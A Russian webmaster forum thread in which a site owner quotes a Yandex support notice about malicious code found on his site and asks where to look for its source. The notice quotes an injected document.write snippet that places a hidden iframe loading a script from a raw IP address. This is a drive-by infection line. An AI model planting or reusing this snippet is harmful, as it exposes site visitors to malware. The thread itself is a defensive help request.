Вредоносный код. Ответ от Платона Щукина
Страницы: 1
Вредоносный код. Ответ от Платона Щукина
Пару дней назад написал письмо в Службу поддержки Яндекса по поводу частого обнаружения вредоносного кода на двух моих сайтах. Сегодня получил такой ответ:
Цитата
Здравствуйте!

При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил вредоносный код следующего содержания:

document.write('<style>.ihxck4rb { position:absolute; left:-1493px; top:-1491px} </style> <div class="ihxck4rb"><iframe src="http://129.121.203.202/9eb29177f66d54745371ac1c4052487d/q.php" width="120" height="101"></iframe></div>');

который детектировался в скрипте /engine/classes/min/index.php?charset=windows-1251&g=general&4" .

Данный вредоносный код динамически вставляется в HTTP ответ для произвольного js-файла, поэтому, возможно, Вы не сможете обнаружить его в указанных нами js-фалах. Мы предполагаем, что источник этого кода может находится на серверной стороне сайта: бинарные файлы, модули, конфигурационные файлы и т.п.
Если у Вас есть возможность, мы будем благодарны за любые присланные файлы для анализа данного типа заражения.

Может кто подскажет какие файлы отправлять
Ну что вы скажите?
Что тут скажешь, iframe кто-то внедрил в код. Заходи в указанный им файл и удаляй не нужные строки.
KPeople: Как скачать видео с YouTube? (10 способов)


Так непонятно где искать. Этот файл /engine/classes/min/index.php проверил, ничего подобного не видел. Все файлы .js проверил. Тоже подобного кода не нашел
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
14:31 Rotapost прикрыли! Чем пользоваться? 
00:23 Раскрутка форума 
00:19 Продвижение по ключам 
17:40 LOSPOLLOS.COM - Конвертим по рецепту Хайзенберга. Dating, Mainstream, Binary Options 
14:07 2Index - быстрая индексация страниц сайта и обратных ссылок 
12:02 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
22:23 Подскажите нормальный сервис накрутки ПФ 
17:13 CactusPay.PRO | Умная платёжная система с выводом в USDT TRC-20 
16:45 Услуги продвижения в авито 
15:40 TokenTrade — Ваш новый надежный обменник 
15:15 Продам аккаунты Gmail USA IP | Gmail MIX IP | Outlook Old 
13:22 Мобильные и Резидентные Прокси Для Соц Сетей | 3 Гб Бесплатно 
11:07 SiteAnalyzer SEO Tools - бесплатное браузерное расширение для Chrome & Firefox 
10:54 garantcoin.io - быстрый и надёжный сервис обмена криптовалюты GarantCoin 
16:49 monetizer.agency – рекламная сеть для взрослого и развлекательного трафика. 100$ новому вебмастеру 
20:43 Добро пожаловать в цифровой мир... 
15:59 Про мясо 
23:09 ПП от PMS remote.team - 200$ за команду 
13:28 Компьютерная мышь 
22:55 Ну что, кто куда деваете свои сайты? 
22:34 Используете беспроводные наушники?